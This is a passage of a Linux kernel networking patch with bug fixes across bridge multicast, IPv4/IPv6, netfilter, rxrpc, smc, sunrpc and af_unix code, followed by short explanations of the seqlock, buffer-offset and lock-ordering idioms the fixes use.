+ 		   tb[IFLA_BRIDGE_CFM_CC_CCM_TX_DMAC],
+ 		   sizeof(tx_info.dmac.addr));
+diff --git a/net/bridge/br_multicast.c b/net/bridge/br_multicast.c
+index db4f2641d1cd1..9765f9f9bf7ff 100644
+--- a/net/bridge/br_multicast.c
++++ b/net/bridge/br_multicast.c
+@@ -1607,6 +1607,10 @@ static void br_ip6_multicast_querier_expired(struct timer_list *t)
+ }
+ #endif
+ 
++static void br_multicast_query_delay_expired(struct timer_list *t)
++{
++}
++
+ static void br_multicast_select_own_querier(struct net_bridge_mcast *brmctx,
+ 					    struct br_ip *ip,
+ 					    struct sk_buff *skb)
+@@ -3024,7 +3028,7 @@ br_multicast_update_query_timer(struct net_bridge_mcast *brmctx,
+ 				unsigned long max_delay)
+ {
+ 	if (!timer_pending(&query->timer))
+-		query->delay_time = jiffies + max_delay;
++		mod_timer(&query->delay_timer, jiffies + max_delay);
+ 
+ 	mod_timer(&query->timer, jiffies + brmctx->multicast_querier_interval);
+ }
+@@ -3867,13 +3871,11 @@ void br_multicast_ctx_init(struct net_bridge *br,
+ 	brmctx->multicast_querier_interval = 255 * HZ;
+ 	brmctx->multicast_membership_interval = 260 * HZ;
+ 
+-	brmctx->ip4_other_query.delay_time = 0;
+ 	brmctx->ip4_querier.port_ifidx = 0;
+ 	seqcount_spinlock_init(&brmctx->ip4_querier.seq, &br->multicast_lock);
+ 	brmctx->multicast_igmp_version = 2;
+ #if IS_ENABLED(CONFIG_IPV6)
+ 	brmctx->multicast_mld_version = 1;
+-	brmctx->ip6_other_query.delay_time = 0;
+ 	brmctx->ip6_querier.port_ifidx = 0;
+ 	seqcount_spinlock_init(&brmctx->ip6_querier.seq, &br->multicast_lock);
+ #endif
+@@ -3882,6 +3884,8 @@ void br_multicast_ctx_init(struct net_bridge *br,
+ 		    br_ip4_multicast_local_router_expired, 0);
+ 	timer_setup(&brmctx->ip4_other_query.timer,
+ 		    br_ip4_multicast_querier_expired, 0);
++	timer_setup(&brmctx->ip4_other_query.delay_timer,
++		    br_multicast_query_delay_expired, 0);
+ 	timer_setup(&brmctx->ip4_own_query.timer,
+ 		    br_ip4_multicast_query_expired, 0);
+ #if IS_ENABLED(CONFIG_IPV6)
+@@ -3889,6 +3893,8 @@ void br_multicast_ctx_init(struct net_bridge *br,
+ 		    br_ip6_multicast_local_router_expired, 0);
+ 	timer_setup(&brmctx->ip6_other_query.timer,
+ 		    br_ip6_multicast_querier_expired, 0);
++	timer_setup(&brmctx->ip6_other_query.delay_timer,
++		    br_multicast_query_delay_expired, 0);
+ 	timer_setup(&brmctx->ip6_own_query.timer,
+ 		    br_ip6_multicast_query_expired, 0);
+ #endif
+@@ -4023,10 +4029,12 @@ static void __br_multicast_stop(struct net_bridge_mcast *brmctx)
+ {
+ 	del_timer_sync(&brmctx->ip4_mc_router_timer);
+ 	del_timer_sync(&brmctx->ip4_other_query.timer);
++	del_timer_sync(&brmctx->ip4_other_query.delay_timer);
+ 	del_timer_sync(&brmctx->ip4_own_query.timer);
+ #if IS_ENABLED(CONFIG_IPV6)
+ 	del_timer_sync(&brmctx->ip6_mc_router_timer);
+ 	del_timer_sync(&brmctx->ip6_other_query.timer);
++	del_timer_sync(&brmctx->ip6_other_query.delay_timer);
+ 	del_timer_sync(&brmctx->ip6_own_query.timer);
+ #endif
+ }
+@@ -4469,13 +4477,15 @@ int br_multicast_set_querier(struct net_bridge_mcast *brmctx, unsigned long val)
+ 	max_delay = brmctx->multicast_query_response_interval;
+ 
+ 	if (!timer_pending(&brmctx->ip4_other_query.timer))
+-		brmctx->ip4_other_query.delay_time = jiffies + max_delay;
++		mod_timer(&brmctx->ip4_other_query.delay_timer,
++			  jiffies + max_delay);
+ 
+ 	br_multicast_start_querier(brmctx, &brmctx->ip4_own_query);
+ 
+ #if IS_ENABLED(CONFIG_IPV6)
+ 	if (!timer_pending(&brmctx->ip6_other_query.timer))
+-		brmctx->ip6_other_query.delay_time = jiffies + max_delay;
++		mod_timer(&brmctx->ip6_other_query.delay_timer,
++			  jiffies + max_delay);
+ 
+ 	br_multicast_start_querier(brmctx, &brmctx->ip6_own_query);
+ #endif
+diff --git a/net/bridge/br_private.h b/net/bridge/br_private.h
+index 06e5f6faa4313..51d010f64e066 100644
+--- a/net/bridge/br_private.h
++++ b/net/bridge/br_private.h
+@@ -77,7 +77,7 @@ struct bridge_mcast_own_query {
+ /* other querier */
+ struct bridge_mcast_other_query {
+ 	struct timer_list		timer;
+-	unsigned long			delay_time;
++	struct timer_list		delay_timer;
+ };
+ 
+ /* selected querier */
+@@ -1083,7 +1083,7 @@ __br_multicast_querier_exists(struct net_bridge_mcast *brmctx,
+ 		own_querier_enabled = false;
+ 	}
+ 
+-	return time_is_before_jiffies(querier->delay_time) &&
++	return !timer_pending(&querier->delay_timer) &&
+ 	       (own_querier_enabled || timer_pending(&querier->timer));
+ }
+ 
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index e19ef88ae181f..a6d460aaee794 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -1268,6 +1268,12 @@ static int ip_setup_cork(struct sock *sk, struct inet_cork *cork,
+ 	if (unlikely(!rt))
+ 		return -EFAULT;
+ 
++	cork->fragsize = ip_sk_use_pmtu(sk) ?
++			 dst_mtu(&rt->dst) : READ_ONCE(rt->dst.dev->mtu);
++
++	if (!inetdev_valid_mtu(cork->fragsize))
++		return -ENETUNREACH;
++
+ 	/*
+ 	 * setup for corking.
+ 	 */
+@@ -1284,12 +1290,6 @@ static int ip_setup_cork(struct sock *sk, struct inet_cork *cork,
+ 		cork->addr = ipc->addr;
+ 	}
+ 
+-	cork->fragsize = ip_sk_use_pmtu(sk) ?
+-			 dst_mtu(&rt->dst) : READ_ONCE(rt->dst.dev->mtu);
+-
+-	if (!inetdev_valid_mtu(cork->fragsize))
+-		return -ENETUNREACH;
+-
+ 	cork->gso_size = ipc->gso_size;
+ 
+ 	cork->dst = &rt->dst;
+diff --git a/net/ipv4/ip_sockglue.c b/net/ipv4/ip_sockglue.c
+index c1fb7580ea581..a00ba2d51e1b2 100644
+--- a/net/ipv4/ip_sockglue.c
++++ b/net/ipv4/ip_sockglue.c
+@@ -1406,12 +1406,13 @@ e_inval:
+  * ipv4_pktinfo_prepare - transfer some info from rtable to skb
+  * @sk: socket
+  * @skb: buffer
++ * @drop_dst: if true, drops skb dst
+  *
+  * To support IP_CMSG_PKTINFO option, we store rt_iif and specific
+  * destination in skb->cb[] before dst drop.
+  * This way, receiver doesn't make cache line misses to read rtable.
+  */
+-void ipv4_pktinfo_prepare(const struct sock *sk, struct sk_buff *skb)
++void ipv4_pktinfo_prepare(const struct sock *sk, struct sk_buff *skb, bool drop_dst)
+ {
+ 	struct in_pktinfo *pktinfo = PKTINFO_SKB_CB(skb);
+ 	bool prepare = (inet_sk(sk)->cmsg_flags & IP_CMSG_PKTINFO) ||
+@@ -1440,7 +1441,8 @@ void ipv4_pktinfo_prepare(const struct sock *sk, struct sk_buff *skb)
+ 		pktinfo->ipi_ifindex = 0;
+ 		pktinfo->ipi_spec_dst.s_addr = 0;
+ 	}
+-	skb_dst_drop(skb);
++	if (drop_dst)
++		skb_dst_drop(skb);
+ }
+ 
+ int ip_setsockopt(struct sock *sk, int level, int optname, sockptr_t optval,
+diff --git a/net/ipv4/ipmr.c b/net/ipv4/ipmr.c
+index b807197475a57..d5421c38c2aae 100644
+--- a/net/ipv4/ipmr.c
++++ b/net/ipv4/ipmr.c
+@@ -1073,7 +1073,7 @@ static int ipmr_cache_report(const struct mr_table *mrt,
+ 		msg = (struct igmpmsg *)skb_network_header(skb);
+ 		msg->im_vif = vifi;
+ 		msg->im_vif_hi = vifi >> 8;
+-		ipv4_pktinfo_prepare(mroute_sk, pkt);
++		ipv4_pktinfo_prepare(mroute_sk, pkt, false);
+ 		memcpy(skb->cb, pkt->cb, sizeof(skb->cb));
+ 		/* Add our header */
+ 		igmp = skb_put(skb, sizeof(struct igmphdr));
+diff --git a/net/ipv4/raw.c b/net/ipv4/raw.c
+index 639aa5abda9dd..7c63b91edbf7a 100644
+--- a/net/ipv4/raw.c
++++ b/net/ipv4/raw.c
+@@ -286,11 +286,13 @@ void raw_icmp_error(struct sk_buff *skb, int protocol, u32 info)
+ 
+ static int raw_rcv_skb(struct sock *sk, struct sk_buff *skb)
+ {
++	enum skb_drop_reason reason;
++
+ 	/* Charge it to the socket. */
+ 
+-	ipv4_pktinfo_prepare(sk, skb);
+-	if (sock_queue_rcv_skb(sk, skb) < 0) {
+-		kfree_skb(skb);
++	ipv4_pktinfo_prepare(sk, skb, true);
++	if (sock_queue_rcv_skb_reason(sk, skb, &reason) < 0) {
++		kfree_skb_reason(skb, reason);
+ 		return NET_RX_DROP;
+ 	}
+ 
+@@ -301,7 +303,7 @@ int raw_rcv(struct sock *sk, struct sk_buff *skb)
+ {
+ 	if (!xfrm4_policy_check(sk, XFRM_POLICY_IN, skb)) {
+ 		atomic_inc(&sk->sk_drops);
+-		kfree_skb(skb);
++		kfree_skb_reason(skb, SKB_DROP_REASON_XFRM_POLICY);
+ 		return NET_RX_DROP;
+ 	}
+ 	nf_reset_ct(skb);
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 90e24c3f65570..86e7695d91adf 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -1934,7 +1934,17 @@ static skb_frag_t *skb_advance_to_frag(struct sk_buff *skb, u32 offset_skb,
+ 
+ static bool can_map_frag(const skb_frag_t *frag)
+ {
+-	return skb_frag_size(frag) == PAGE_SIZE && !skb_frag_off(frag);
++	struct page *page;
++
++	if (skb_frag_size(frag) != PAGE_SIZE || skb_frag_off(frag))
++		return false;
++
++	page = skb_frag_page(frag);
++
++	if (PageCompound(page) || page->mapping)
++		return false;
++
++	return true;
+ }
+ 
+ static int find_next_mappable_frag(const skb_frag_t *frag,
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 11c0e1c666429..87d759bab0012 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -2196,7 +2196,7 @@ static int udp_queue_rcv_one_skb(struct sock *sk, struct sk_buff *skb)
+ 
+ 	udp_csum_pull_header(skb);
+ 
+-	ipv4_pktinfo_prepare(sk, skb);
++	ipv4_pktinfo_prepare(sk, skb, true);
+ 	return __udp_queue_rcv_skb(sk, skb);
+ 
+ csum_error:
+diff --git a/net/ipv6/addrconf_core.c b/net/ipv6/addrconf_core.c
+index 507a8353a6bdb..c008d21925d7f 100644
+--- a/net/ipv6/addrconf_core.c
++++ b/net/ipv6/addrconf_core.c
+@@ -220,19 +220,26 @@ const struct ipv6_stub *ipv6_stub __read_mostly = &(struct ipv6_stub) {
+ EXPORT_SYMBOL_GPL(ipv6_stub);
+ 
+ /* IPv6 Wildcard Address and Loopback Address defined by RFC2553 */
+-const struct in6_addr in6addr_loopback = IN6ADDR_LOOPBACK_INIT;
++const struct in6_addr in6addr_loopback __aligned(BITS_PER_LONG/8)
++	= IN6ADDR_LOOPBACK_INIT;
+ EXPORT_SYMBOL(in6addr_loopback);
+-const struct in6_addr in6addr_any = IN6ADDR_ANY_INIT;
++const struct in6_addr in6addr_any __aligned(BITS_PER_LONG/8)
++	= IN6ADDR_ANY_INIT;
+ EXPORT_SYMBOL(in6addr_any);
+-const struct in6_addr in6addr_linklocal_allnodes = IN6ADDR_LINKLOCAL_ALLNODES_INIT;
++const struct in6_addr in6addr_linklocal_allnodes __aligned(BITS_PER_LONG/8)
++	= IN6ADDR_LINKLOCAL_ALLNODES_INIT;
+ EXPORT_SYMBOL(in6addr_linklocal_allnodes);
+-const struct in6_addr in6addr_linklocal_allrouters = IN6ADDR_LINKLOCAL_ALLROUTERS_INIT;
++const struct in6_addr in6addr_linklocal_allrouters __aligned(BITS_PER_LONG/8)
++	= IN6ADDR_LINKLOCAL_ALLROUTERS_INIT;
+ EXPORT_SYMBOL(in6addr_linklocal_allrouters);
+-const struct in6_addr in6addr_interfacelocal_allnodes = IN6ADDR_INTERFACELOCAL_ALLNODES_INIT;
++const struct in6_addr in6addr_interfacelocal_allnodes __aligned(BITS_PER_LONG/8)
++	= IN6ADDR_INTERFACELOCAL_ALLNODES_INIT;
+ EXPORT_SYMBOL(in6addr_interfacelocal_allnodes);
+-const struct in6_addr in6addr_interfacelocal_allrouters = IN6ADDR_INTERFACELOCAL_ALLROUTERS_INIT;
++const struct in6_addr in6addr_interfacelocal_allrouters __aligned(BITS_PER_LONG/8)
++	= IN6ADDR_INTERFACELOCAL_ALLROUTERS_INIT;
+ EXPORT_SYMBOL(in6addr_interfacelocal_allrouters);
+-const struct in6_addr in6addr_sitelocal_allrouters = IN6ADDR_SITELOCAL_ALLROUTERS_INIT;
++const struct in6_addr in6addr_sitelocal_allrouters __aligned(BITS_PER_LONG/8)
++	= IN6ADDR_SITELOCAL_ALLROUTERS_INIT;
+ EXPORT_SYMBOL(in6addr_sitelocal_allrouters);
+ 
+ static void snmp6_free_dev(struct inet6_dev *idev)
+diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c
+index 9125e92d9917e..2699915bb85be 100644
+--- a/net/ipv6/ip6_tunnel.c
++++ b/net/ipv6/ip6_tunnel.c
+@@ -796,8 +796,8 @@ static int __ip6_tnl_rcv(struct ip6_tnl *tunnel, struct sk_buff *skb,
+ 						struct sk_buff *skb),
+ 			 bool log_ecn_err)
+ {
+-	const struct ipv6hdr *ipv6h = ipv6_hdr(skb);
+-	int err;
++	const struct ipv6hdr *ipv6h;
++	int nh, err;
+ 
+ 	if ((!(tpi->flags & TUNNEL_CSUM) &&
+ 	     (tunnel->parms.i_flags & TUNNEL_CSUM)) ||
+@@ -829,7 +829,6 @@ static int __ip6_tnl_rcv(struct ip6_tnl *tunnel, struct sk_buff *skb,
+ 			goto drop;
+ 		}
+ 
+-		ipv6h = ipv6_hdr(skb);
+ 		skb->protocol = eth_type_trans(skb, tunnel->dev);
+ 		skb_postpull_rcsum(skb, eth_hdr(skb), ETH_HLEN);
+ 	} else {
+@@ -837,7 +836,23 @@ static int __ip6_tnl_rcv(struct ip6_tnl *tunnel, struct sk_buff *skb,
+ 		skb_reset_mac_header(skb);
+ 	}
+ 
++	/* Save offset of outer header relative to skb->head,
++	 * because we are going to reset the network header to the inner header
++	 * and might change skb->head.
++	 */
++	nh = skb_network_header(skb) - skb->head;
++
+ 	skb_reset_network_header(skb);
++
++	if (!pskb_inet_may_pull(skb)) {
++		DEV_STATS_INC(tunnel->dev, rx_length_errors);
++		DEV_STATS_INC(tunnel->dev, rx_errors);
++		goto drop;
++	}
++
++	/* Get the outer header. */
++	ipv6h = (struct ipv6hdr *)(skb->head + nh);
++
+ 	memset(skb->cb, 0, sizeof(struct inet6_skb_parm));
+ 
+ 	__skb_tunnel_rx(skb, tunnel->dev, tunnel->net);
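
The tunnel fix records the outer header's offset relative to skb->head before pskb_inet_may_pull(), since pulling can reallocate the head and leave a raw ipv6h pointer dangling. The same offset-not-pointer discipline applies to any resizable buffer; a realloc-based illustration:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
	char *head = malloc(64);
	if (!head)
		return 1;
	strcpy(head, "outer-header inner-header");

	char *outer = head;              /* raw pointer into the buffer */
	size_t nh = outer - head;        /* offset: survives realloc */

	head = realloc(head, 4096);      /* may move the allocation */
	if (!head)
		return 1;

	/* 'outer' may now dangle; head + nh is always valid */
	printf("outer header: %.12s\n", head + nh);
	free(head);
	return 0;
}
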
+diff --git a/net/llc/af_llc.c b/net/llc/af_llc.c
+index 19c478bd85bd8..8e3be0009f609 100644
+--- a/net/llc/af_llc.c
++++ b/net/llc/af_llc.c
+@@ -226,6 +226,8 @@ static int llc_ui_release(struct socket *sock)
+ 	}
+ 	netdev_put(llc->dev, &llc->dev_tracker);
+ 	sock_put(sk);
++	sock_orphan(sk);
++	sock->sk = NULL;
+ 	llc_sk_free(sk);
+ out:
+ 	return 0;
+diff --git a/net/netfilter/nf_conntrack_proto_tcp.c b/net/netfilter/nf_conntrack_proto_tcp.c
+index 3ac1af6f59fcc..e0092bf273fd0 100644
+--- a/net/netfilter/nf_conntrack_proto_tcp.c
++++ b/net/netfilter/nf_conntrack_proto_tcp.c
+@@ -457,7 +457,8 @@ static void tcp_init_sender(struct ip_ct_tcp_state *sender,
+ 			    const struct sk_buff *skb,
+ 			    unsigned int dataoff,
+ 			    const struct tcphdr *tcph,
+-			    u32 end, u32 win)
++			    u32 end, u32 win,
++			    enum ip_conntrack_dir dir)
+ {
+ 	/* SYN-ACK in reply to a SYN
+ 	 * or SYN from reply direction in simultaneous open.
+@@ -471,7 +472,8 @@ static void tcp_init_sender(struct ip_ct_tcp_state *sender,
+ 	 * Both sides must send the Window Scale option
+ 	 * to enable window scaling in either direction.
+ 	 */
+-	if (!(sender->flags & IP_CT_TCP_FLAG_WINDOW_SCALE &&
++	if (dir == IP_CT_DIR_REPLY &&
++	    !(sender->flags & IP_CT_TCP_FLAG_WINDOW_SCALE &&
+ 	      receiver->flags & IP_CT_TCP_FLAG_WINDOW_SCALE)) {
+ 		sender->td_scale = 0;
+ 		receiver->td_scale = 0;
+@@ -542,7 +544,7 @@ tcp_in_window(struct nf_conn *ct, enum ip_conntrack_dir dir,
+ 		if (tcph->syn) {
+ 			tcp_init_sender(sender, receiver,
+ 					skb, dataoff, tcph,
+-					end, win);
++					end, win, dir);
+ 			if (!tcph->ack)
+ 				/* Simultaneous open */
+ 				return NFCT_TCP_ACCEPT;
+@@ -585,7 +587,7 @@ tcp_in_window(struct nf_conn *ct, enum ip_conntrack_dir dir,
+ 		 */
+ 		tcp_init_sender(sender, receiver,
+ 				skb, dataoff, tcph,
+-				end, win);
++				end, win, dir);
+ 
+ 		if (dir == IP_CT_DIR_REPLY && !tcph->ack)
+ 			return NFCT_TCP_ACCEPT;
+diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
+index 8a29290149bd7..be93a02497d6c 100644
+--- a/net/netfilter/nf_log.c
++++ b/net/netfilter/nf_log.c
+@@ -193,11 +193,12 @@ void nf_logger_put(int pf, enum nf_log_type type)
+ 		return;
+ 	}
+ 
+-	BUG_ON(loggers[pf][type] == NULL);
+-
+ 	rcu_read_lock();
+ 	logger = rcu_dereference(loggers[pf][type]);
+-	module_put(logger->me);
++	if (!logger)
++		WARN_ON_ONCE(1);
++	else
++		module_put(logger->me);
+ 	rcu_read_unlock();
+ }
+ EXPORT_SYMBOL_GPL(nf_logger_put);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 1edb2138260a8..49acb89ba9c56 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -7129,11 +7129,15 @@ nla_put_failure:
+ 	return -1;
+ }
+ 
+-static const struct nft_object_type *__nft_obj_type_get(u32 objtype)
++static const struct nft_object_type *__nft_obj_type_get(u32 objtype, u8 family)
+ {
+ 	const struct nft_object_type *type;
+ 
+ 	list_for_each_entry(type, &nf_tables_objects, list) {
++		if (type->family != NFPROTO_UNSPEC &&
++		    type->family != family)
++			continue;
++
+ 		if (objtype == type->type)
+ 			return type;
+ 	}
+@@ -7141,11 +7145,11 @@ static const struct nft_object_type *__nft_obj_type_get(u32 objtype)
+ }
+ 
+ static const struct nft_object_type *
+-nft_obj_type_get(struct net *net, u32 objtype)
++nft_obj_type_get(struct net *net, u32 objtype, u8 family)
+ {
+ 	const struct nft_object_type *type;
+ 
+-	type = __nft_obj_type_get(objtype);
++	type = __nft_obj_type_get(objtype, family);
+ 	if (type != NULL && try_module_get(type->owner))
+ 		return type;
+ 
+@@ -7238,7 +7242,7 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 		if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
+ 			return -EOPNOTSUPP;
+ 
+-		type = __nft_obj_type_get(objtype);
++		type = __nft_obj_type_get(objtype, family);
+ 		if (WARN_ON_ONCE(!type))
+ 			return -ENOENT;
+ 
+@@ -7252,7 +7256,7 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 	if (!nft_use_inc(&table->use))
+ 		return -EMFILE;
+ 
+-	type = nft_obj_type_get(net, objtype);
++	type = nft_obj_type_get(net, objtype, family);
+ 	if (IS_ERR(type)) {
+ 		err = PTR_ERR(type);
+ 		goto err_type;
+diff --git a/net/netfilter/nft_ct.c b/net/netfilter/nft_ct.c
+index 641dc21f92b43..1101665f52537 100644
+--- a/net/netfilter/nft_ct.c
++++ b/net/netfilter/nft_ct.c
+@@ -1231,7 +1231,31 @@ static int nft_ct_expect_obj_init(const struct nft_ctx *ctx,
+ 	if (tb[NFTA_CT_EXPECT_L3PROTO])
+ 		priv->l3num = ntohs(nla_get_be16(tb[NFTA_CT_EXPECT_L3PROTO]));
+ 
++	switch (priv->l3num) {
++	case NFPROTO_IPV4:
++	case NFPROTO_IPV6:
++		if (priv->l3num != ctx->family)
++			return -EINVAL;
++
++		fallthrough;
++	case NFPROTO_INET:
++		break;
++	default:
++		return -EOPNOTSUPP;
++	}
++
+ 	priv->l4proto = nla_get_u8(tb[NFTA_CT_EXPECT_L4PROTO]);
++	switch (priv->l4proto) {
++	case IPPROTO_TCP:
++	case IPPROTO_UDP:
++	case IPPROTO_UDPLITE:
++	case IPPROTO_DCCP:
++	case IPPROTO_SCTP:
++		break;
++	default:
++		return -EOPNOTSUPP;
++	}
++
+ 	priv->dport = nla_get_be16(tb[NFTA_CT_EXPECT_DPORT]);
+ 	priv->timeout = nla_get_u32(tb[NFTA_CT_EXPECT_TIMEOUT]);
+ 	priv->size = nla_get_u8(tb[NFTA_CT_EXPECT_SIZE]);
+diff --git a/net/netfilter/nft_tunnel.c b/net/netfilter/nft_tunnel.c
+index 983ade4be3b39..efb505445eac1 100644
+--- a/net/netfilter/nft_tunnel.c
++++ b/net/netfilter/nft_tunnel.c
+@@ -713,6 +713,7 @@ static const struct nft_object_ops nft_tunnel_obj_ops = {
+ 
+ static struct nft_object_type nft_tunnel_obj_type __read_mostly = {
+ 	.type		= NFT_OBJECT_TUNNEL,
++	.family		= NFPROTO_NETDEV,
+ 	.ops		= &nft_tunnel_obj_ops,
+ 	.maxattr	= NFTA_TUNNEL_KEY_MAX,
+ 	.policy		= nft_tunnel_key_policy,
+diff --git a/net/rxrpc/conn_service.c b/net/rxrpc/conn_service.c
+index 6e6aa02c6f9e8..249353417a182 100644
+--- a/net/rxrpc/conn_service.c
++++ b/net/rxrpc/conn_service.c
+@@ -31,7 +31,7 @@ struct rxrpc_connection *rxrpc_find_service_conn_rcu(struct rxrpc_peer *peer,
+ 	struct rxrpc_conn_proto k;
+ 	struct rxrpc_skb_priv *sp = rxrpc_skb(skb);
+ 	struct rb_node *p;
+-	unsigned int seq = 0;
++	unsigned int seq = 1;
+ 
+ 	k.epoch	= sp->hdr.epoch;
+ 	k.cid	= sp->hdr.cid & RXRPC_CIDMASK;
+@@ -41,6 +41,7 @@ struct rxrpc_connection *rxrpc_find_service_conn_rcu(struct rxrpc_peer *peer,
+ 		 * under just the RCU read lock, so we have to check for
+ 		 * changes.
+ 		 */
++		seq++; /* 2 on the 1st/lockless path, otherwise odd */
+ 		read_seqbegin_or_lock(&peer->service_conn_lock, &seq);
+ 
+ 		p = rcu_dereference_raw(peer->service_conns.rb_node);
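
For context on the rxrpc change: read_seqbegin_or_lock() only falls back to
taking the lock when it is handed an odd sequence number; an even value asks
for another lockless pass. With seq initialized to 0 it stayed even forever,
so a reader racing a busy writer could retry indefinitely. A minimal sketch
of the corrected retry idiom, with illustrative names rather than the rxrpc
structures:

        int seq = 1;

        do {
                /* even (lockless) on the first pass, odd (locked) on retries */
                seq++;
                read_seqbegin_or_lock(&my_seqlock, &seq);
                item = lookup_protected_structure();
        } while (need_seqretry(&my_seqlock, seq));
        done_seqretry(&my_seqlock, seq);

Starting at 1 and incrementing at the top of the loop makes the first pass run
with an even value (lockless) and every retry with an odd one, so the reader is
guaranteed to fall back to the lock instead of spinning.
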
+diff --git a/net/smc/smc_clc.c b/net/smc/smc_clc.c
+index 9b8999e2afca5..867df45228152 100644
+--- a/net/smc/smc_clc.c
++++ b/net/smc/smc_clc.c
+@@ -155,10 +155,12 @@ static int smc_clc_ueid_remove(char *ueid)
+ 			rc = 0;
+ 		}
+ 	}
++#if IS_ENABLED(CONFIG_S390)
+ 	if (!rc && !smc_clc_eid_table.ueid_cnt) {
+ 		smc_clc_eid_table.seid_enabled = 1;
+ 		rc = -EAGAIN;	/* indicate success and enabling of seid */
+ 	}
++#endif
+ 	write_unlock(&smc_clc_eid_table.lock);
+ 	return rc;
+ }
+@@ -273,22 +275,30 @@ err:
+ 
+ int smc_nl_enable_seid(struct sk_buff *skb, struct genl_info *info)
+ {
++#if IS_ENABLED(CONFIG_S390)
+ 	write_lock(&smc_clc_eid_table.lock);
+ 	smc_clc_eid_table.seid_enabled = 1;
+ 	write_unlock(&smc_clc_eid_table.lock);
+ 	return 0;
++#else
++	return -EOPNOTSUPP;
++#endif
+ }
+ 
+ int smc_nl_disable_seid(struct sk_buff *skb, struct genl_info *info)
+ {
+ 	int rc = 0;
+ 
++#if IS_ENABLED(CONFIG_S390)
+ 	write_lock(&smc_clc_eid_table.lock);
+ 	if (!smc_clc_eid_table.ueid_cnt)
+ 		rc = -ENOENT;
+ 	else
+ 		smc_clc_eid_table.seid_enabled = 0;
+ 	write_unlock(&smc_clc_eid_table.lock);
++#else
++	rc = -EOPNOTSUPP;
++#endif
+ 	return rc;
+ }
+ 
+@@ -1168,7 +1178,11 @@ void __init smc_clc_init(void)
+ 	INIT_LIST_HEAD(&smc_clc_eid_table.list);
+ 	rwlock_init(&smc_clc_eid_table.lock);
+ 	smc_clc_eid_table.ueid_cnt = 0;
++#if IS_ENABLED(CONFIG_S390)
+ 	smc_clc_eid_table.seid_enabled = 1;
++#else
++	smc_clc_eid_table.seid_enabled = 0;
++#endif
+ }
+ 
+ void smc_clc_exit(void)
+diff --git a/net/sunrpc/xprtmultipath.c b/net/sunrpc/xprtmultipath.c
+index 74ee2271251e3..720d3ba742ec0 100644
+--- a/net/sunrpc/xprtmultipath.c
++++ b/net/sunrpc/xprtmultipath.c
+@@ -336,8 +336,9 @@ struct rpc_xprt *xprt_iter_current_entry_offline(struct rpc_xprt_iter *xpi)
+ 			xprt_switch_find_current_entry_offline);
+ }
+ 
+-bool rpc_xprt_switch_has_addr(struct rpc_xprt_switch *xps,
+-			      const struct sockaddr *sap)
++static
++bool __rpc_xprt_switch_has_addr(struct rpc_xprt_switch *xps,
++				const struct sockaddr *sap)
+ {
+ 	struct list_head *head;
+ 	struct rpc_xprt *pos;
+@@ -356,6 +357,18 @@ bool rpc_xprt_switch_has_addr(struct rpc_xprt_switch *xps,
+ 	return false;
+ }
+ 
++bool rpc_xprt_switch_has_addr(struct rpc_xprt_switch *xps,
++			      const struct sockaddr *sap)
++{
++	bool res;
++
++	rcu_read_lock();
++	res = __rpc_xprt_switch_has_addr(xps, sap);
++	rcu_read_unlock();
++
++	return res;
++}
++
+ static
+ struct rpc_xprt *xprt_switch_find_next_entry(struct list_head *head,
+ 		const struct rpc_xprt *cur, bool check_active)
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index be2ed7b0fe21c..e1af94393789f 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -1322,13 +1322,11 @@ static void unix_state_double_lock(struct sock *sk1, struct sock *sk2)
+ 		unix_state_lock(sk1);
+ 		return;
+ 	}
+-	if (sk1 < sk2) {
+-		unix_state_lock(sk1);
+-		unix_state_lock_nested(sk2);
+-	} else {
+-		unix_state_lock(sk2);
+-		unix_state_lock_nested(sk1);
+-	}
++	if (sk1 > sk2)
++		swap(sk1, sk2);
++
++	unix_state_lock(sk1);
++	unix_state_lock_nested(sk2, U_LOCK_SECOND);
+ }
+ 
+ static void unix_state_double_unlock(struct sock *sk1, struct sock *sk2)
+@@ -1559,7 +1557,7 @@ restart:
+ 		goto out_unlock;
+ 	}
+ 
+-	unix_state_lock_nested(sk);
++	unix_state_lock_nested(sk, U_LOCK_SECOND);
+ 
+ 	if (sk->sk_state != st) {
+ 		unix_state_unlock(sk);
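
The af_unix hunk swaps pointers instead of duplicating the lock calls, which is
the standard address-ordering idiom for taking two locks of the same class:
always acquire the lower-addressed object first, and annotate the second
acquisition with an explicit lockdep subclass. A generic sketch of the pattern
(hedged; struct foo and its mutex are illustrative, not the af_unix types):

        static void foo_double_lock(struct foo *a, struct foo *b)
        {
                if (a > b)
                        swap(a, b);     /* global order: lower address first */

                mutex_lock(&a->lock);
                /* a second lock of the same class needs its own lockdep subclass */
                mutex_lock_nested(&b->lock, SINGLE_DEPTH_NESTING);
        }

Because every caller acquires any pair in the same global order, two tasks
locking the same two objects can never deadlock ABBA-style, and the explicit
U_LOCK_SECOND subclass in the real code keeps lockdep from flagging the nested
acquisition as a self-deadlock.
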
+diff --git a/net/unix/diag.c b/net/unix/diag.c
+index 616b55c5b8908..3438b7af09af5 100644
+--- a/net/unix/diag.c
++++ b/net/unix/diag.c
+@@ -84,7 +84,7 @@ static int sk_diag_dump_icons(struct sock *sk, struct sk_buff *nlskb)
+ 			 * queue lock. With the other's queue locked it's
+ 			 * OK to lock the state.
+ 			 */
+-			unix_state_lock_nested(req);
++			unix_state_lock_nested(req, U_LOCK_DIAG);
+ 			peer = unix_sk(req)->peer;
+ 			buf[i++] = (peer ? sock_i_ino(peer) : 0);
+ 			unix_state_unlock(req);
+diff --git a/net/wireless/scan.c b/net/wireless/scan.c
